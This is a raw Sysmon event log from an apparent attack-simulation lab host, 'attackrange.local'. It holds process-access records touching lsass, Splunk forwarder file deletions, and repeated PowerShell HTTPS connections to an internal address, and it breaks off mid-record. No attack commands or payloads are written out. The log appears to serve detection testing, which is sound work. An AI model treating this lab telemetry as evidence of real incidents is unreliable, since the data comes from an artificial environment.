Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.134{B81B27B7-A07B-6140-7456-04000000C801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:40.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99351CB791B0F3E9F8A35440C967B102,SHA256=278DA909F3A32FD86E3009E817CA81E92D65BE920C7A1438C6D16B91A2025C68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:40.136{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26F84F1BC30CFF57779AAEF8B11297CD,SHA256=6CD053D984782F311C8BC5CD90458C039C54F3B7A7FCEC2D7FFD398CD4C3EEBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:41.903{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2362623A0AD0CDB052F032941E16FFC1,SHA256=0809C76B5EDA3E8336C963C7BE2A4AD294D5899858E4D94EA4B50824A37A2672,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:11.756{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50494-false10.0.1.12-8000- 354300x800000000000000036497105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:11.640{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50493-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:41.054{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4EB9793566FBFEEDE40ABC117FAA4278,SHA256=1A39B4D6631670174E968055DC8B069699B04563C776433B36C9EF0C7E378D7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:42.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D2F6A0562E384A520FE17D17417A3D5,SHA256=E849A9A1A12935720BC274F3442AF81DAF89BBD50F2D25F862ECB161B8A5C857,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:43.949{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D34FA7F24BD7EEA71EE98B3382F41B24,SHA256=78231D69EBF8563D15E0DD745E972F19C6C8A96FB6449F5342922D18319246D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:44.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48A13A2DCA9C59E57273F176AC24DDA0,SHA256=9C0DC6E5A88B35456E17CBFDEFA6811BEB35370D9DED4A19ADF6B6AFD3A7F530,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:16.651{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50495-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:46.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A1159EC132D40D0BCB348D696793AD4E,SHA256=2EF211F538DD6CC19C31A4DE3AD703BCBEE170FB709215AF660F46FF7391A7A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:45.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF2C40A5EE7589232FAAE0B3C27FEC1C,SHA256=5665DC0EBC0DA3E1388C56AFB08BD69E0090EE6752FC66ADDEB5DA9BEEEA7A2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:47.013{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93083A0EF4815D8AB58276D2A5379352,SHA256=A3F2BFDE3417BA787BCAA0DEEE9243A5D9C1400550A458BE7E5093017B685BBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:17.780{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50496-false10.0.1.12-8000- 23542300x800000000000000036497115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:48.046{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6011C35B229A582DC391E37F5E72576,SHA256=851D00C4256CCAC6769210EF36B3C19E99B01F7F91D340EBBA03C458084FFEE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:49.126{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A019ADB1EEDD5EEBCBDEC946961F8EA,SHA256=7EABE6447C0DF463281AE10203C208AB5C9E18661DC44F273D493BA2F4AAF595,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:50.143{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97D34A0F1059F9C95888368772CF49A2,SHA256=E1B0EB201729A6D57EA5EED26E538C549802519DF4D2C17DBBC96D9462C01656,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:21.661{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50497-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:51.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA2456D7D678EED62071D4474A5BEF84,SHA256=6CD1EF0890E8C9DD481E4B2D74AB163BC9A2E966C8E40886C4CDA19397304855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:51.108{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4982B298B7EF2C192821E60CA9AE0185,SHA256=BD9A3479898CC0950905BAF031A0CE0E4E21D13E04FE785FE9B972641053D15A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:52.207{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78A5984AE9C2B597E5603466323FD489,SHA256=429BCFBD699C0E27971918577AA70C7D3471C048A343841F16CCDB71C950CC13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:23.774{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50498-false10.0.1.12-8000- 23542300x800000000000000036497123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:53.221{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E0EAE41BBDA5C43FEBDC01F2BD19240,SHA256=C646A8E1D06F923287690A96B203D8207FDAA7B5788A97F013DC0B880B708DB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:54.239{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD6B4AB99AF7D2DE2D78CE8887782D7C,SHA256=86F3CAA9C21B9C9115148B28F029A2FBC2998895C9EDC201D5BC7448779FFAE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:55.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58ABC2638044698AB580C2237B7C6054,SHA256=D04220EA998BE8C86BBDA7FE62B9AC9023BADFF84D4582092C76D750DFE750CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.703{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.703{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.703{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.687{B81B27B7-4013-611D-1600-00000000C801}1196900C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7656-04000000C801}1240C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+3ef6a|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.671{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7656-04000000C801}1240C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.656{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A08C-6140-7656-04000000C801}1240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.656{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7656-04000000C801}1240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.640{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.640{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.640{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.635{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 